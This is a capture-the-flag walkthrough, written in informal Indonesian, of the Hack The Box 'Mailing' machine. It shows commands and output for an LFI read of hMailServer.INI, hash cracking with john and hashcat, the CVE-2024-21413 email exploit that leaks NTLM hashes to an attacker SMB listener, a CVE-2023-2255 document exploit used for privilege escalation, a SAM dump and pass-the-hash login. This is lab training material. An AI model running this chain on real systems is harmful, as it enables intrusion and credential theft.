|_ Message signing enabled but not required

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 16 02:38:16 2024 -- 1 IP address (1 host up) scanned in 71.32 seconds

terdapat smb,imap,pop3, dan http terbuka

lgsg aja masuk ke initial discovery ke port 80 nya kita set dlu di /etc/hosts

10.129.231.40 mailing.htb

nah kita tau ini pakai hmailserver

lgsg aja search exploitnya dan dpt kalo vuln lfi : https://www.exploit-db.com/exploits/7012

tapi pas di cek gada. lgsg aja kita coba pakai dirsearch

200 31B http://mailing.htb/download.php

nah ada download.php lgsg kita masukin payloadnya

nah di exploit db sebenrnya pakai program files doang karna program files doang itu gada 404 kita coba di x86 program files dan ada. ke download

cat hMailServer.INI
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 │ File: hMailServer.INI
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 1 │ [Directories]
 2 │ ProgramFolder=C:\Program Files (x86)\hMailServer
 3 │ DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
 4 │ DataFolder=C:\Program Files (x86)\hMailServer\Data
 5 │ LogFolder=C:\Program Files (x86)\hMailServer\Logs
 6 │ TempFolder=C:\Program Files (x86)\hMailServer\Temp
 7 │ EventFolder=C:\Program Files (x86)\hMailServer\Events
 8 │ [GUILanguages]
 9 │ ValidLanguages=english,swedish
 10 │ [Security]
 11 │ AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
 12 │ [Database]
 13 │ Type=MSSQLCE
 14 │ Username=
 15 │ Password=0a9f8ad8bf896b501dde74f08efd7e4c
 16 │ PasswordEncryption=1
 17 │ Port=0
 18 │ Server=
 19 │ Database=hMailServer
 20 │ Internal=1
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

masukin ke file buat kita crack

cat administrator.hash
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 │ File: administrator.hash
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 1 │ 841bb5acfa6779ae432fd7a4e6600ba7
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

sudo john administrator.hash --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt --format=Raw-Md5
[sudo] password for replican:
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
homenetworkingadministrator (?)
1g 0:00:00:00 DONE (2024-05-16 04:39) 3.030g/s 22915Kp/s 22915Kc/s 22915KC/s homepc..homeiyun88
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

nah kita dapet deh creds emailnya yaitu

[email protected]:homenetworkingadministrator

balik ke port 80 tadi dan buka instruction.pdf nya ( download tombol paling bwh )

disini kita tau kalo kita ngesend email nanti sama maya auto diliat ( kita asumsi ada bot buat auto ngeliat setiap message baru )

disini lgsg terpikirkan exploit yg baru2 ini ada di email services outlook. ( gw jg tau nya dari htb forum dikasih hint :v )

lgsg aja pakai responder dan cve nya buat gaining zero click account leak

kalo yg gatau apa itu responder itu buat dpetin creds nya maya abis kita ngesend emailnya

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url "\\10.10.14.45" --subject XD

[SMB] NTLMv2-SSP Client : 10.129.231.40
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:e6a1aa4dfd95ab9f:546ECAE13A0B53BB1E7F662632271430:010100000000000000E3947642A7DA01E6A5C7F43A9AF34D000000000200080032004D005300510001001E00570049004E002D00360033005A003900390041004E004F0059005100580004003400570049004E002D00360033005A003900390041004E004F005900510058002E0032004D00530051002E004C004F00430041004C000300140032004D00530051002E004C004F00430041004C000500140032004D00530051002E004C004F00430041004C000700080000E3947642A7DA0106000400020000000800300030000000000000000000000000200000B5B650195CCF25DA9E362F08460DF10A6043234F3B80DE71CD2B446A1F46FF9D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340035000000000000000000

nah di responder dapet deh creds hash nya si maya, tinggal kita crack lagi pake hashcat kali ini pakai mode 5600

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 491 MB

Dictionary cache hit:
* Filename..: /home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f662632271430:010100000000000000e3947642a7da01e6a5c7f43a9af34d000000000200080032004d005300510001001e00570049004e002d00360033005a003900390041004e004f0059005100580004003400570049004e002d00360033005a003900390041004e004f005900510058002e0032004d00530051002e004c004f00430041004c000300140032004d00530051002e004c004f00430041004c000500140032004d00530051002e004c004f00430041004c000700080000e3947642a7da0106000400020000000800300030000000000000000000000000200000b5b650195ccf25da9e362f08460df10a6043234f3b80de71cd2b446a1f46ff9d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000:m4y4ngs4ri

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f...000000
Time.Started.....: Thu May 16 03:42:48 2024 (1 sec)
Time.Estimated...: Thu May 16 03:42:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 19633.9 kH/s (3.17ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7340032/14344384 (51.17%)
Rejected.........: 0/7340032 (0.00%)
Restore.Point....: 5505024/14344384 (38.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: minterwint -> ina-123456
Hardware.Mon.#1..: Temp: 52c Fan: 49% Util: 19% Core:1837MHz Mem:7300MHz Bus:16

Started: Thu May 16 03:42:42 2024
Stopped: Thu May 16 03:42:49 2024 

dan dpet deh lgsg login pakai evil-winrm

evil-winrm -i 10.129.231.40 -u maya -p m4y4ngs4ri

dan ke desktop dapet user flag

kita cek list program files

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program
"C:/Program Files (x86)/" "C:/Program Files/" "C:/ProgramData"
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program Files/"
*Evil-WinRM* PS C:\Program Files> ls

 Directory: C:\Program Files

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell

*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/"
"C:/Program Files/LibreOffice/CREDITS.fodt" "C:/Program Files/LibreOffice/help/" "C:/Program Files/LibreOffice/program/"
"C:/Program Files/LibreOffice/LICENSE.html" "C:/Program Files/LibreOffice/license.txt" "C:/Program Files/LibreOffice/readmes/"
"C:/Program Files/LibreOffice/NOTICE" "C:/Program Files/LibreOffice/presets/" "C:/Program Files/LibreOffice/share/"
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en"
Cannot find path 'C:\Program Files\LibreOffice\readmes\readme_en' because it does not exist.
At line:1 char:1
+ cat "C:/Program Files/LibreOffice/readmes/readme_en"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : ObjectNotFound: (C:\Program File...admes\readme_en:String) [Get-Content], ItemNotFoundException
 + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en-US.txt"

======================================================================

LibreOffice 7.4 ReadMe

versi 7.4 Libreoffice : https://www.libreoffice.org/about-us/security/advisories/CVE-2023-2255

python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

fungsinya biar maya ada di group admin dan bisa ngedump creds sam

nah abis itu taruh di C:\Important Documents

user maya jadi punya group administrator lgsg aja dump creds nya si localadmin

command : crackmapexec smb 10.129.231.40 -u maya -p m4y4ngs4ri --sam
SMB 10.129.231.40 445 MAILING [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.231.40 445 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB 10.129.231.40 445 MAILING [*] Dumping SAM hashes
SMB 10.129.231.40 445 MAILING Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB 10.129.231.40 445 MAILING localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB 10.129.231.40 445 MAILING maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB 10.129.231.40 445 MAILING [+] Added 6 SAM hashes to the database

dapet deh tinggal login lgi pake winrm

evil-winrm -i 10.129.231.40 -u localadmin -H "9aa582783780d1546d62f2d102daefae"

done, tinggal ke desktop lgi dan ada root flag